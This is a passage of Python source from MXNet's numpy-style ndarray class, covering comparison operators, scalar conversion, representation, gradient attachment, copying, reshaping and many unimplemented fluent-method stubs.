if isinstance(other, ndarray):
return _npi.less(self, other)
elif isinstance(other, numeric_types):
return _npi.less_scalar(self, float(other))
else:
raise TypeError("ndarray does not support type {} as operand".format(str(type(other))))
def __le__(self, other):
"""x.__le__(y) <=> x <= y"""
# TODO(junwu): Return boolean ndarray when dtype=bool_ is supported
if isinstance(other, ndarray):
return _npi.less_equal(self, other)
elif isinstance(other, numeric_types):
return _npi.less_equal_scalar(self, float(other))
else:
raise TypeError("ndarray does not support type {} as operand".format(str(type(other))))
def __bool__(self):
num_elements = self.size
if num_elements == 0:
warnings.simplefilter('default')
warnings.warn('The truth value of an empty array is ambiguous. Returning False, but in'
' future this will result in an error.', DeprecationWarning)
return False
elif num_elements == 1:
return bool(self.item())
else:
raise ValueError("The truth value of an ndarray with multiple elements is ambiguous.")
__nonzero__ = __bool__
def __float__(self):
num_elements = self.size
if num_elements != 1:
raise TypeError('only size-1 arrays can be converted to Python scalars')
return float(self.item())
def __int__(self):
num_elements = self.size
if num_elements != 1:
raise TypeError('only size-1 arrays can be converted to Python scalars')
return int(self.item())
def __len__(self):
"""Number of elements along the first axis."""
shape = self.shape
if len(shape) == 0:
raise TypeError('len() of unsized object')
return self.shape[0]
def __reduce__(self):
return ndarray, (None,), self.__getstate__()
def item(self, *args):
"""Copy an element of an array to a standard Python scalar and return it.
Parameters
----------
*args : Arguments (variable number and type)
none: in this case, the method only works for arrays with one element (a.size == 1),
which element is copied into a standard Python scalar object and returned.
int_type: this argument is interpreted as a flat index into the array, specifying which
element to copy and return.
tuple of int_types: functions as does a single int_type argument, except that the
argument is interpreted as an nd-index into the array.
Returns
-------
z : Standard Python scalar object
A copy of the specified element of the array as a suitable Python scalar.
"""
# TODO(junwu): no need to call asnumpy() on the whole array.
return self.asnumpy().item(*args)
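    # Illustrative sketch (added commentary, not part of the original source):
    #   >>> a = array([[1., 2.], [3., 4.]])
    #   >>> a.item(3)         # flat index into the array
    #   4.0
    #   >>> a.item((1, 0))    # nd-index into the array
    #   3.0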
@property
# pylint: disable= invalid-name, undefined-variable
def T(self):
"""Same as self.transpose(). This always returns a copy of self."""
return self.transpose()
# pylint: enable= invalid-name, undefined-variable
def all(self, axis=None, out=None, keepdims=False):
raise NotImplementedError
def any(self, axis=None, out=None, keepdims=False):
raise NotImplementedError
def as_nd_ndarray(self):
"""Convert mxnet.numpy.ndarray to mxnet.ndarray.NDArray to use its fluent methods."""
hdl = NDArrayHandle()
check_call(_LIB.MXShallowCopyNDArray(self.handle, ctypes.byref(hdl)))
return NDArray(handle=hdl, writable=self.writable)
def as_np_ndarray(self):
"""A convenience function for creating a numpy ndarray from the current ndarray
with zero copy. For this class, it just returns itself since it's already a
numpy ndarray."""
return self
def __repr__(self):
"""
Returns a string representation of the array. The dtype of the ndarray will not
be appended to the string if it is `float32`. The context of the ndarray will
be appended for devices other than CPU.
Examples
--------
>>> from mxnet import np, npx
>>> a = np.random.uniform(size=(2, 3))
>>> a
array([[0.5488135 , 0.5928446 , 0.71518934],
[0.84426576, 0.60276335, 0.8579456 ]])
>>> print(a)
[[0.5488135 0.5928446 0.71518934]
[0.84426576 0.60276335 0.8579456 ]]
>>> a.dtype
<class 'numpy.float32'>
>>> b = a.astype(np.float64)
>>> b
array([[0.54881352, 0.59284461, 0.71518934],
[0.84426576, 0.60276335, 0.85794562]], dtype=float64)
>>> print(b)
[[0.54881352 0.59284461 0.71518934]
[0.84426576 0.60276335 0.85794562]]
>>> b.dtype
<class 'numpy.float64'>
>>> c = a.copyto(npx.gpu(0))
>>> c
array([[0.5488135 , 0.5928446 , 0.71518934],
[0.84426576, 0.60276335, 0.8579456 ]], ctx=gpu(0))
>>> print(c)
[[0.5488135 0.5928446 0.71518934]
[0.84426576 0.60276335 0.8579456 ]] @gpu(0)
>>> d = b.copyto(npx.gpu(0))
>>> d
array([[0.54881352, 0.59284461, 0.71518934],
[0.84426576, 0.60276335, 0.85794562]], dtype=float64, ctx=gpu(0))
>>> print(d)
[[0.54881352 0.59284461 0.71518934]
[0.84426576 0.60276335 0.85794562]] @gpu(0)
"""
array_str = self.asnumpy().__repr__()
dtype = self.dtype
if 'dtype=' in array_str:
if dtype == _np.float32:
array_str = array_str[:array_str.rindex(',')] + ')'
elif dtype != _np.float32:
array_str = array_str[:-1] + ', dtype={})'.format(dtype.__name__)
context = self.context
if context.device_type == 'cpu':
return array_str
return array_str[:-1] + ', ctx={})'.format(str(context))
def __str__(self):
"""Returns a string representation of the array."""
array_str = self.asnumpy().__str__()
context = self.context
if context.device_type == 'cpu' or self.ndim == 0:
return array_str
return '{array} @{ctx}'.format(array=array_str, ctx=context)
def attach_grad(self, grad_req='write'): # pylint: disable=arguments-differ
"""Attach a gradient buffer to this ndarray, so that `backward`
can compute gradient with respect to it.
Parameters
----------
grad_req : {'write', 'add', 'null'}
How gradient will be accumulated.
- 'write': gradient will be overwritten on every backward.
- 'add': gradient will be added to existing value on every backward.
- 'null': do not compute gradient for this NDArray.
"""
grad = _mx_np_op.zeros_like(self) # pylint: disable=undefined-variable
grad_req = _GRAD_REQ_MAP[grad_req]
check_call(_LIB.MXAutogradMarkVariables(
1, ctypes.pointer(self.handle),
ctypes.pointer(mx_uint(grad_req)),
ctypes.pointer(grad.handle)))
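    # Illustrative sketch (added commentary, not part of the original source) of the
    # autograd workflow this method enables; `autograd` refers to mxnet.autograd and is
    # assumed to be imported by the caller:
    #   >>> x = array([1., 2., 3.])
    #   >>> x.attach_grad()
    #   >>> with autograd.record():
    #   ...     y = (x * x).sum()
    #   >>> y.backward()
    #   >>> x.grad             # gradient buffer filled in by backward()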
@property
def grad(self):
"""Returns gradient buffer attached to this ndarray."""
hdl = NDArrayHandle()
check_call(_LIB.MXNDArrayGetGrad(self.handle, ctypes.byref(hdl)))
if hdl.value is None:
return None
return _np_ndarray_cls(hdl)
def detach(self):
"""Returns a new ndarray, detached from the current graph."""
hdl = NDArrayHandle()
check_call(_LIB.MXNDArrayDetach(self.handle, ctypes.byref(hdl)))
return _np_ndarray_cls(hdl)
def astype(self, dtype, *args, **kwargs): # pylint: disable=arguments-differ,unused-argument
"""
Copy of the array, cast to a specified type.
Parameters
----------
dtype : str or dtype
Typecode or data-type to which the array is cast.
copy : bool, optional
Default `True`. By default, astype always returns a newly
allocated ndarray on the same context. If this is set to
`False`, and the dtype requested is the same as the ndarray's
dtype, the ndarray is returned instead of a copy.
Returns
-------
arr_t : ndarray
Unless `copy` is False and the other conditions for returning the input
array are satisfied (see description for `copy` input parameter), `arr_t`
is a new array of the same shape as the input array with `dtype`.
"""
_sanity_check_params('astype', ['order', 'casting', 'subok'], kwargs)
copy = kwargs.get('copy', True)
if not copy and _np.dtype(dtype) == self.dtype:
return self
res = empty(self.shape, dtype=dtype, ctx=self.context)
self.copyto(res)
return res
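    # Illustrative sketch (added commentary, not part of the original source):
    #   >>> x = ones((2, 3))                        # default dtype is float32
    #   >>> x.astype('float64').dtype               # copies and casts by default
    #   >>> x.astype('float32', copy=False) is x    # same dtype + copy=False -> no copy
    #   True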
def copyto(self, other):
"""Copies the value of this array to another array.
If ``other`` is a ``ndarray`` object, then ``other.shape`` and
``self.shape`` should be the same. This function copies the value from
``self`` to ``other``.
If ``other`` is a context, a new ``np.ndarray`` will be first created on
the target context, and the value of ``self`` is copied.
Parameters
----------
other : ndarray or Context
The destination array or context.
Returns
-------
out: ndarray
The copied array. If ``other`` is an ``ndarray``, then the return value
and ``other`` will point to the same ``ndarray``.
Examples
--------
>>> x = np.ones((2, 3))
>>> y = np.zeros((2, 3), ctx=npx.gpu(0))
>>> z = x.copyto(y)
>>> z is y
True
>>> y
array([[ 1., 1., 1.],
[ 1., 1., 1.]])
"""
if isinstance(other, ndarray):
if other.handle is self.handle:
warnings.warn('You are attempting to copy an array to itself', RuntimeWarning)
return False
return _npi.copyto(self, out=other)
elif isinstance(other, Context):
hret = ndarray(_new_alloc_handle(self.shape, other, True, self.dtype))
return _npi.copyto(self, out=hret)
else:
raise TypeError('copyto does not support type ' + str(type(other)))
def asscalar(self):
raise AttributeError('mxnet.numpy.ndarray object has no attribute asscalar')
def argmax(self, axis=None, out=None): # pylint: disable=arguments-differ
"""Return indices of the maximum values along the given axis.
Refer to `mxnet.numpy.argmax` for full documentation."""
return argmax(self, axis, out)
def as_in_context(self, context):
"""This function has been deprecated. Please refer to ``ndarray.as_in_ctx``."""
        warnings.warn('ndarray.as_in_context has been renamed to ndarray.as_in_ctx', DeprecationWarning)
return self.as_nd_ndarray().as_in_context(context).as_np_ndarray()
def as_in_ctx(self, ctx):
"""Returns an array on the target device with the same value as this array.
If the target context is the same as ``self.context``, then ``self`` is
returned. Otherwise, a copy is made.
Parameters
----------
        ctx : Context
The target context.
Returns
-------
ndarray
The target array.
"""
if self.ctx == ctx:
return self
return self.copyto(ctx)
@property
def ctx(self):
"""Device context of the array.
Examples
--------
>>> x = np.array([1, 2, 3, 4])
>>> x.ctx
cpu(0)
>>> type(x.ctx)
<class 'mxnet.context.Context'>
>>> y = np.zeros((2, 3), npx.gpu(0))
>>> y.ctx
gpu(0)
"""
dev_typeid = ctypes.c_int()
dev_id = ctypes.c_int()
check_call(_LIB.MXNDArrayGetContext(
self.handle, ctypes.byref(dev_typeid), ctypes.byref(dev_id)))
return Context(Context.devtype2str[dev_typeid.value], dev_id.value)
@property
def context(self):
"""This function has been deprecated. Please refer to ``ndarray.ctx``."""
warnings.warn('ndarray.context has been renamed to ndarray.ctx', DeprecationWarning)
return self.as_nd_ndarray().context
def copy(self, order='C'): # pylint: disable=arguments-differ
"""Return a coyp of the array, keeping the same context.
Parameters
----------
order : str
The memory layout of the copy. Currently, only c-contiguous memory
layout is supported.
Examples
--------
>>> x = np.ones((2, 3))
>>> y = x.copy()
>>> y
array([[ 1., 1., 1.],
[ 1., 1., 1.]])
"""
if order != 'C':
raise NotImplementedError('ndarray.copy only supports order=\'C\', while '
'received {}'.format(str(order)))
return self.copyto(self.ctx)
def dot(self, b, out=None):
"""Dot product of two arrays.
Refer to ``numpy.dot`` for full documentation."""
return _mx_np_op.dot(self, b, out=out)
def reshape(self, *args, **kwargs): # pylint: disable=arguments-differ
"""Returns a copy of the array with a new shape.
Notes
-----
Unlike the free function `numpy.reshape`, this method on `ndarray` allows
the elements of the shape parameter to be passed in as separate arguments.
For example, ``a.reshape(10, 11)`` is equivalent to
``a.reshape((10, 11))``.
"""
order = 'C'
if len(kwargs) > 1:
raise TypeError('function takes at most 1 keyword argument')
if len(kwargs) == 1:
if 'order' not in kwargs:
raise TypeError('{} is an invalid keyword argument for this function'
                                .format(list(kwargs.keys())[0]))
order = kwargs.pop('order', 'C')
if order != 'C':
raise NotImplementedError('only supports C-order,'
' while received {}'.format(order))
if len(args) == 0:
raise TypeError('reshape() takes exactly 1 argument (0 given)')
if len(args) == 1 and isinstance(args[0], tuple):
return _mx_np_op.reshape(self, newshape=args[0], order=order)
else:
return _mx_np_op.reshape(self, newshape=args, order=order)
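    # Illustrative sketch (added commentary, not part of the original source): the new
    # shape may be given either as a tuple or as separate positional arguments.
    #   >>> a = arange(6)
    #   >>> a.reshape((2, 3)).shape
    #   (2, 3)
    #   >>> a.reshape(3, 2).shape    # equivalent to a.reshape((3, 2))
    #   (3, 2)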
def reshape_like(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`reshape_like`.
The arguments are the same as for :py:func:`reshape_like`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute reshape_like')
def reshape_view(self, *shape, **kwargs):
"""Returns a **view** of this array with a new shape without altering any data.
        Inherited from NDArray.reshape.
"""
return super(ndarray, self).reshape(*shape, **kwargs)
def zeros_like(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`zeros_like`.
The arguments are the same as for :py:func:`zeros_like`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute zeros_like')
def ones_like(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`ones_like`.
The arguments are the same as for :py:func:`ones_like`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute ones_like')
def broadcast_axes(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`broadcast_axes`.
The arguments are the same as for :py:func:`broadcast_axes`, with
this array as data.
"""
        raise AttributeError('mxnet.numpy.ndarray object has no attribute broadcast_axes')
def repeat(self, repeats, axis=None): # pylint: disable=arguments-differ
"""Repeat elements of an array."""
return _mx_np_op.repeat(self, repeats=repeats, axis=axis)
def pad(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`pad`.
The arguments are the same as for :py:func:`pad`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute pad')
def swapaxes(self, axis1, axis2): # pylint: disable=arguments-differ
"""Return a copy of the array with axis1 and axis2 interchanged.
Refer to `mxnet.numpy.swapaxes` for full documentation.
"""
return swapaxes(self, axis1, axis2)
def split(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`split`.
The arguments are the same as for :py:func:`split`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute split')
def split_v2(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`split_v2`.
The arguments are the same as for :py:func:`split_v2`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute split_v2')
def slice(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`slice`.
The arguments are the same as for :py:func:`slice`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute slice')
def slice_axis(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`slice_axis`.
The arguments are the same as for :py:func:`slice_axis`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute slice_axis')
def slice_like(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`slice_like`.
The arguments are the same as for :py:func:`slice_like`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute slice_like')
def slice_assign_scalar(self, value, begin, end, step):
"""
        Assign a scalar to a cropped subset of this ndarray. The value is broadcast to the cropped shape
        and cast to the same dtype as this ndarray.
Parameters
----------
        value: numeric value
            Value and this ndarray should be of the same data type.
            The value is broadcast to the cropped shape of this ndarray.
begin: tuple of begin indices
end: tuple of end indices
        step: tuple of step lengths
Returns
-------
This ndarray.
Examples
--------
>>> x = np.ones((2, 2, 2))
>>> y = x.slice_assign_scalar(0, (0, 0, None), (1, 1, None), (None, None, None))
>>> y
array([[[0., 0.],
[1., 1.]],
[[1., 1.],
[1., 1.]]])
>>> x
array([[[0., 0.],
[1., 1.]],
[[1., 1.],
[1., 1.]]])
"""
return _npi.slice_assign_scalar(self, value, begin=begin, end=end, step=step, out=self)
def slice_assign(self, rhs, begin, end, step):
"""
Assign the rhs to a cropped subset of this ndarray in place.
Returns the view of this ndarray.
Parameters
----------
rhs: ndarray.
rhs and this NDArray should be of the same data type, and on the same device.
The shape of rhs should be the same as the cropped shape of this ndarray.
begin: tuple of begin indices
end: tuple of end indices
        step: tuple of step lengths
Returns
-------
out : ndarray
This ndarray.
Examples
--------
>>> x = np.ones((2, 2, 2))
>>> assigned = np.zeros((1, 1, 2))
>>> y = x.slice_assign(assigned, (0, 0, None), (1, 1, None), (None, None, None))
>>> y
array([[[0., 0.],
[1., 1.]],
[[1., 1.],
[1., 1.]]])
>>> x
array([[[0., 0.],
[1., 1.]],
[[1., 1.],
[1., 1.]]])
"""
return _npi.slice_assign(self, rhs, begin=begin, end=end, step=step, out=self)
def take(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`take`.
The arguments are the same as for :py:func:`take`, with
this array as data.
"""
raise NotImplementedError
def one_hot(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`one_hot`.
The arguments are the same as for :py:func:`one_hot`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute one_hot')
def pick(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`pick`.
The arguments are the same as for :py:func:`pick`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute pick')
def sort(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`sort`.
The arguments are the same as for :py:func:`sort`, with
this array as data.
"""
raise NotImplementedError
def topk(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`topk`.
The arguments are the same as for :py:func:`topk`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute topk')
def argsort(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`argsort`.
The arguments are the same as for :py:func:`argsort`, with
this array as data.
"""
raise NotImplementedError
def argmax_channel(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`argmax_channel`.
The arguments are the same as for :py:func:`argmax_channel`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute argmax_channel')
def argmin(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`argmin`.
The arguments are the same as for :py:func:`argmin`, with
this array as data.
"""
raise NotImplementedError
def clip(self, min=None, max=None, out=None): # pylint: disable=arguments-differ
"""Return an array whose values are limited to [min, max].
One of max or min must be given.
"""
return clip(self, min, max, out=out)
def abs(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`abs`.
The arguments are the same as for :py:func:`abs`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute abs')
def sign(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`sign`.
The arguments are the same as for :py:func:`sign`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute sign')
def flatten(self, order='C'): # pylint: disable=arguments-differ
"""Return a copy of the array collapsed into one dimension."""
return self.reshape(-1, order=order)
def shape_array(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`shape_array`.
The arguments are the same as for :py:func:`shape_array`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute shape_array')
def size_array(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`size_array`.
The arguments are the same as for :py:func:`size_array`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute size_array')
def expand_dims(self, *args, **kwargs): # pylint: disable=arguments-differ,unused-argument
"""Convenience fluent method for :py:func:`expand_dims`.
The arguments are the same as for :py:func:`expand_dims`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute expand_dims')
def tile(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`tile`.
The arguments are the same as for :py:func:`tile`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute tile')
def transpose(self, *axes): # pylint: disable=arguments-differ
"""Permute the dimensions of an array."""
return _mx_np_op.transpose(self, axes=axes if len(axes) != 0 else None)
def flip(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`flip`.
The arguments are the same as for :py:func:`flip`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute flip')
def depth_to_space(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`depth_to_space`.
The arguments are the same as for :py:func:`depth_to_space`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute depth_to_space')
def space_to_depth(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`space_to_depth`.
The arguments are the same as for :py:func:`space_to_depth`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute space_to_depth')
def diag(self, k=0, **kwargs):
"""Convenience fluent method for :py:func:`diag`.
The arguments are the same as for :py:func:`diag`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute diag')
def sum(self, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""Return the sum of the array elements over the given axis."""
return _mx_np_op.sum(self, axis=axis, dtype=dtype, out=out, keepdims=keepdims)
def nansum(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`nansum`.
The arguments are the same as for :py:func:`nansum`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute nansum')
def prod(self, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""Return the product of the array elements over the given axis."""
return _mx_np_op.prod(self, axis=axis, dtype=dtype, keepdims=keepdims, out=out)
def nanprod(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`nanprod`.
The arguments are the same as for :py:func:`nanprod`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute nanprod')
def mean(self, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""Returns the average of the array elements along given axis."""
return mean(self, axis=axis, dtype=dtype, out=out, keepdims=keepdims)
def std(self, axis=None, dtype=None, out=None, ddof=0, keepdims=False): # pylint: disable=arguments-differ
"""Returns the standard deviation of the array elements along given axis."""
return std(self, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
def var(self, axis=None, dtype=None, out=None, ddof=0, keepdims=False): # pylint: disable=arguments-differ
"""Returns the variance of the array elements, along given axis."""
return var(self, axis=axis, dtype=dtype, out=out, ddof=ddof, keepdims=keepdims)
def cumsum(self, axis=None, dtype=None, out=None):
"""Return the cumulative sum of the elements along the given axis."""
return _mx_np_op.cumsum(self, axis=axis, dtype=dtype, out=out)
def tolist(self):
return self.asnumpy().tolist()
def max(self, axis=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""Return the maximum along a given axis."""
return _mx_np_op.max(self, axis=axis, keepdims=keepdims, out=out)
def min(self, axis=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""Convenience fluent method for :py:func:`min`.
The arguments are the same as for :py:func:`min`, with
this array as data.
"""
return _mx_np_op.min(self, axis=axis, keepdims=keepdims, out=out)
def norm(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`norm`.
The arguments are the same as for :py:func:`norm`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute norm')
def round(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`round`.
The arguments are the same as for :py:func:`round`, with
this array as data.
"""
raise NotImplementedError
def rint(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`rint`.
The arguments are the same as for :py:func:`rint`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute rint')
def fix(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`fix`.
The arguments are the same as for :py:func:`fix`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute fix')
def floor(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`floor`.
The arguments are the same as for :py:func:`floor`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute floor')
def ceil(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`ceil`.
The arguments are the same as for :py:func:`ceil`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute ceil')
def trunc(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`trunc`.
The arguments are the same as for :py:func:`trunc`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute trunc')
def sin(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`sin`.
The arguments are the same as for :py:func:`sin`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute sin')
def cos(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`cos`.
The arguments are the same as for :py:func:`cos`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute cos')
def tan(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`tan`.
The arguments are the same as for :py:func:`tan`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute tan')
def arcsin(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`arcsin`.
The arguments are the same as for :py:func:`arcsin`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute arcsin')
def arccos(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`arccos`.
The arguments are the same as for :py:func:`arccos`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute arccos')
def arctan(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`arctan`.
The arguments are the same as for :py:func:`arctan`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute arctan')
def degrees(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`degrees`.
The arguments are the same as for :py:func:`degrees`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute degrees')
def radians(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`radians`.
The arguments are the same as for :py:func:`radians`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute radians')
def sinh(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`sinh`.
The arguments are the same as for :py:func:`sinh`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute sinh')
def cosh(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`cosh`.
The arguments are the same as for :py:func:`cosh`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute cosh')
def tanh(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`tanh`.
The arguments are the same as for :py:func:`tanh`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute tanh')
def arcsinh(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`arcsinh`.
The arguments are the same as for :py:func:`arcsinh`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute arcsinh')
def arccosh(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`arccosh`.
The arguments are the same as for :py:func:`arccosh`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute arccosh')
def arctanh(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`arctanh`.
The arguments are the same as for :py:func:`arctanh`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute arctanh')
def exp(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`exp`.
The arguments are the same as for :py:func:`exp`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute exp')
def expm1(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`expm1`.
The arguments are the same as for :py:func:`expm1`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute expm1')
def log(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`log`.
The arguments are the same as for :py:func:`log`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute log')
def log10(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`log10`.
The arguments are the same as for :py:func:`log10`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute log10')
def log2(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`log2`.
The arguments are the same as for :py:func:`log2`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute log2')
def log1p(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`log1p`.
The arguments are the same as for :py:func:`log1p`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute log1p')
def sqrt(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`sqrt`.
The arguments are the same as for :py:func:`sqrt`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute sqrt')
def rsqrt(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`rsqrt`.
The arguments are the same as for :py:func:`rsqrt`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute rsqrt')
def cbrt(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`cbrt`.
The arguments are the same as for :py:func:`cbrt`, with
this array as data.
"""
        raise AttributeError('mxnet.numpy.ndarray object has no attribute cbrt')
def rcbrt(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`rcbrt`.
The arguments are the same as for :py:func:`rcbrt`, with
this array as data.
"""
        raise AttributeError('mxnet.numpy.ndarray object has no attribute rcbrt')
def square(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`square`.
The arguments are the same as for :py:func:`square`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute square')
def reciprocal(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`reciprocal`.
The arguments are the same as for :py:func:`reciprocal`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute reciprocal')
def relu(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`relu`.
The arguments are the same as for :py:func:`relu`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute relu')
def sigmoid(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`sigmoid`.
The arguments are the same as for :py:func:`sigmoid`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute sigmoid')
def softmax(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`softmax`.
The arguments are the same as for :py:func:`softmax`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute softmax')
def log_softmax(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`log_softmax`.
The arguments are the same as for :py:func:`log_softmax`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute log_softmax')
def softmin(self, *args, **kwargs):
"""Convenience fluent method for :py:func:`softmin`.
The arguments are the same as for :py:func:`softmin`, with
this array as data.
"""
raise AttributeError('mxnet.numpy.ndarray object has no attribute softmin')
def squeeze(self, axis=None): # pylint: disable=arguments-differ
"""Remove single-dimensional entries from the shape of a."""
return _mx_np_op.squeeze(self, axis=axis)
def broadcast_to(self, shape):
return _mx_np_op.broadcast_to(self, shape)
def broadcast_like(self, other):
raise AttributeError('mxnet.numpy.ndarray object has no attribute broadcast_like')
def _full(self, value):
"""
Currently for internal use only. Implemented for __setitem__.
Assign to self an array of self's same shape and type, filled with value.
"""
